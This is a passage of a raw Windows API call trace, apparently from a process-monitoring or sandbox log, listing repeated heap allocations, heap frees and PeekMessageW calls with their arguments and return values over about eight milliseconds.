hHeap=0x770000, dwFlags=0x0, lpMem=0x888b18 | out: hHeap=0x770000) returned 1 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88dbe0 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b18 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b30 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884e10 [0026.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b30 | out: hHeap=0x770000) returned 1 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878d80 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b30 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884e20 [0026.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884e20 | out: hHeap=0x770000) returned 1 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b48 [0026.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884e20 [0026.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884e20 | out: hHeap=0x770000) returned 1 [0026.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b30 | out: hHeap=0x770000) returned 1 [0026.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b48 | out: hHeap=0x770000) returned 1 [0026.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x878d80 | out: hHeap=0x770000) returned 1 [0026.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884e10 | out: hHeap=0x770000) returned 1 [0026.273] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878d80 [0026.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b48 [0026.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884e10 [0026.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b48 | out: hHeap=0x770000) returned 1 [0026.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878da8 [0026.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b48 [0026.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b30 [0026.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884e20 [0026.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b30 | out: hHeap=0x770000) returned 1 [0026.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878dd0 [0026.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b30 [0026.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884e30 [0026.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884e30 | out: hHeap=0x770000) returned 1 [0026.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b60 [0026.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884e30 [0026.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884e30 | out: hHeap=0x770000) returned 1 [0026.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b78 [0026.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884e30 [0026.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884e30 | out: hHeap=0x770000) returned 1 [0026.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b30 | out: hHeap=0x770000) returned 1 [0026.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b60 | out: hHeap=0x770000) returned 1 [0026.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b78 | out: hHeap=0x770000) returned 1 [0026.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x878dd0 | out: hHeap=0x770000) returned 1 [0026.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884e20 | out: hHeap=0x770000) returned 1 [0026.273] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878dd0 [0026.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b78 [0026.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884e20 [0026.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b78 | out: hHeap=0x770000) returned 1 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878df8 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b78 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b60 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884e30 [0026.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b60 | out: hHeap=0x770000) returned 1 [0026.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884e30 | out: hHeap=0x770000) returned 1 [0026.274] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878e20 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b60 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884e30 [0026.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b60 | out: hHeap=0x770000) returned 1 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878e48 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b60 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b30 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884e40 [0026.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b30 | out: hHeap=0x770000) returned 1 [0026.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884e40 | out: hHeap=0x770000) returned 1 [0026.274] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878e70 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b30 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884e40 [0026.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b30 | out: hHeap=0x770000) returned 1 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878e98 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b30 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b90 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884e50 [0026.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b90 | out: hHeap=0x770000) returned 1 [0026.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884e50 | out: hHeap=0x770000) returned 1 [0026.274] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878ec0 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b90 [0026.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884e50 [0026.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888b90 | out: hHeap=0x770000) returned 1 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878ee8 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888b90 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ba8 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884e60 [0026.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ba8 | out: hHeap=0x770000) returned 1 [0026.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884e60 | out: hHeap=0x770000) returned 1 [0026.275] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878f10 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ba8 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884e60 [0026.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ba8 | out: hHeap=0x770000) returned 1 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88dc18 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ba8 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888bc0 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884e70 [0026.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888bc0 | out: hHeap=0x770000) returned 1 [0026.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884e70 | out: hHeap=0x770000) returned 1 [0026.275] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878f38 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888bc0 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884e70 [0026.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888bc0 | out: hHeap=0x770000) returned 1 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88dc50 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888bc0 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888bd8 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884e80 [0026.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888bd8 | out: hHeap=0x770000) returned 1 [0026.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884e80 | out: hHeap=0x770000) returned 1 [0026.275] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878f60 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888bd8 [0026.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884e80 [0026.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888bd8 | out: hHeap=0x770000) returned 1 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88dc88 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888bd8 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888bf0 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884e90 [0026.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888bf0 | out: hHeap=0x770000) returned 1 [0026.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884e90 | out: hHeap=0x770000) returned 1 [0026.276] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878f88 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888bf0 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884e90 [0026.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888bf0 | out: hHeap=0x770000) returned 1 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88dcc0 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888bf0 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c08 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884ea0 [0026.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888c08 | out: hHeap=0x770000) returned 1 [0026.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884ea0 | out: hHeap=0x770000) returned 1 [0026.276] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878fb0 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c08 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884ea0 [0026.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888c08 | out: hHeap=0x770000) returned 1 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7aaeb8 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c08 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c20 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884eb0 [0026.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888c20 | out: hHeap=0x770000) returned 1 [0026.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884eb0 | out: hHeap=0x770000) returned 1 [0026.276] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x878fd8 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c20 [0026.276] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884eb0 [0026.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888c20 | out: hHeap=0x770000) returned 1 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88dcf8 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c20 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c38 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884ec0 [0026.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888c38 | out: hHeap=0x770000) returned 1 [0026.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884ec0 | out: hHeap=0x770000) returned 1 [0026.277] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x879000 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c38 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884ec0 [0026.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888c38 | out: hHeap=0x770000) returned 1 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88dd30 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c38 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c50 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884ed0 [0026.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888c50 | out: hHeap=0x770000) returned 1 [0026.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884ed0 | out: hHeap=0x770000) returned 1 [0026.277] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x879028 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c50 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884ed0 [0026.277] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888c50 | out: hHeap=0x770000) returned 1 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88dd68 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c50 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c68 [0026.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884ee0 [0026.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888c68 | out: hHeap=0x770000) returned 1 [0026.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884ee0 | out: hHeap=0x770000) returned 1 [0026.278] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x879050 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c68 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884ee0 [0026.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888c68 | out: hHeap=0x770000) returned 1 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab020 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c68 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c80 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884ef0 [0026.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888c80 | out: hHeap=0x770000) returned 1 [0026.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884ef0 | out: hHeap=0x770000) returned 1 [0026.278] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x879078 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c80 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884ef0 [0026.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888c80 | out: hHeap=0x770000) returned 1 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab068 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c80 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c98 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884f00 [0026.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888c98 | out: hHeap=0x770000) returned 1 [0026.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884f00 | out: hHeap=0x770000) returned 1 [0026.278] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x8790a0 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c98 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884f00 [0026.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888c98 | out: hHeap=0x770000) returned 1 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab0b0 [0026.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888c98 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888cb0 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884f10 [0026.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888cb0 | out: hHeap=0x770000) returned 1 [0026.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884f10 | out: hHeap=0x770000) returned 1 [0026.279] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x8790c8 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888cb0 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884f10 [0026.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888cb0 | out: hHeap=0x770000) returned 1 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab0f8 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888cb0 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888cc8 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884f20 [0026.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888cc8 | out: hHeap=0x770000) returned 1 [0026.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884f20 | out: hHeap=0x770000) returned 1 [0026.279] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x8790f0 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888cc8 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884f20 [0026.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888cc8 | out: hHeap=0x770000) returned 1 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x88dda0 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888cc8 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ce0 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884f30 [0026.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ce0 | out: hHeap=0x770000) returned 1 [0026.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884f30 | out: hHeap=0x770000) returned 1 [0026.279] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x879118 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ce0 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884f30 [0026.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ce0 | out: hHeap=0x770000) returned 1 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3268 [0026.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888ce0 [0026.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888cf8 [0026.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884f40 [0026.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888cf8 | out: hHeap=0x770000) returned 1 [0026.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884f40 | out: hHeap=0x770000) returned 1 [0026.280] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x879140 [0026.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888cf8 [0026.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x884f40 [0026.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888cf8 | out: hHeap=0x770000) returned 1 [0026.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab140 [0026.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888cf8 [0026.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888d10 [0026.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x884f50 [0026.280] HeapFree (in: 